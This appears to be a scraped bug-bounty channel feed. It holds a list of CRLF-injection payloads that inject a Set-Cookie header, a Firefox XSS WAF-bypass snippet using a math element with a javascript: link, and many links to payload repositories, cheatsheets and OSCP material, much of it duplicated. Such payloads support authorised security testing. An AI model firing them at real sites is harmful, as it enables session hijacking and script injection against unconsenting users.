CRLF Payload List
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
Bug Bounty Reminder
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
GitHub
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
GitHub
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
Mindmap/Google Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks
https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks
GitHub
Mindmap/Google Dorks at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
Bugcrowd-Vulnerability-Rating-Taxonomy-1.8.pdf
240.2 KB
Bugcrowd-Vulnerability-Rating-Taxonomy-1.8.pdf
WhatsApp'ta Cyber Security kanalΔ±nΔ± takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
WhatsApp.com
Cyber Security | WhatsApp Channel
Cyber Security WhatsApp Channel. . 452 followers
GitHub - fr0gger/Awesome-GPT-Agents: A curated list of GPT agents for cybersecurity
https://github.com/fr0gger/Awesome-GPT-Agents
https://github.com/fr0gger/Awesome-GPT-Agents
GitHub
GitHub - fr0gger/Awesome-GPT-Agents: A curated list of GPT agents for cybersecurity
A curated list of GPT agents for cybersecurity. Contribute to fr0gger/Awesome-GPT-Agents development by creating an account on GitHub.
Having some fun with JavaScript hoisting - Johan Carlsson
https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
Johan Carlsson
Having fun with JavaScript hoisting
Writeup of three JavaScript challenges posted on Twitter during November/December of 2023
Cross-Site Request Forgery
https://www.saygili.org/2020/11/cross-site-request-forgery.html
https://www.saygili.org/2020/11/cross-site-request-forgery.html
Erhan SAYGILI
Cross-Site Request Forgery
GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
https://github.com/rodolfomarianocy/OSCP-Tricks-2023
https://github.com/rodolfomarianocy/OSCP-Tricks-2023
GitHub
GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines - rodolfomarianocy/OSCP-Tricks-2023
Cisco Commands (1).pdf
1.1 MB
Cisco Commands.pdf
Bug bounty Cheatsheet:
For more like this, join us at:
t.me/OSCP_training
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
For more like this, join us at:
t.me/OSCP_training
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files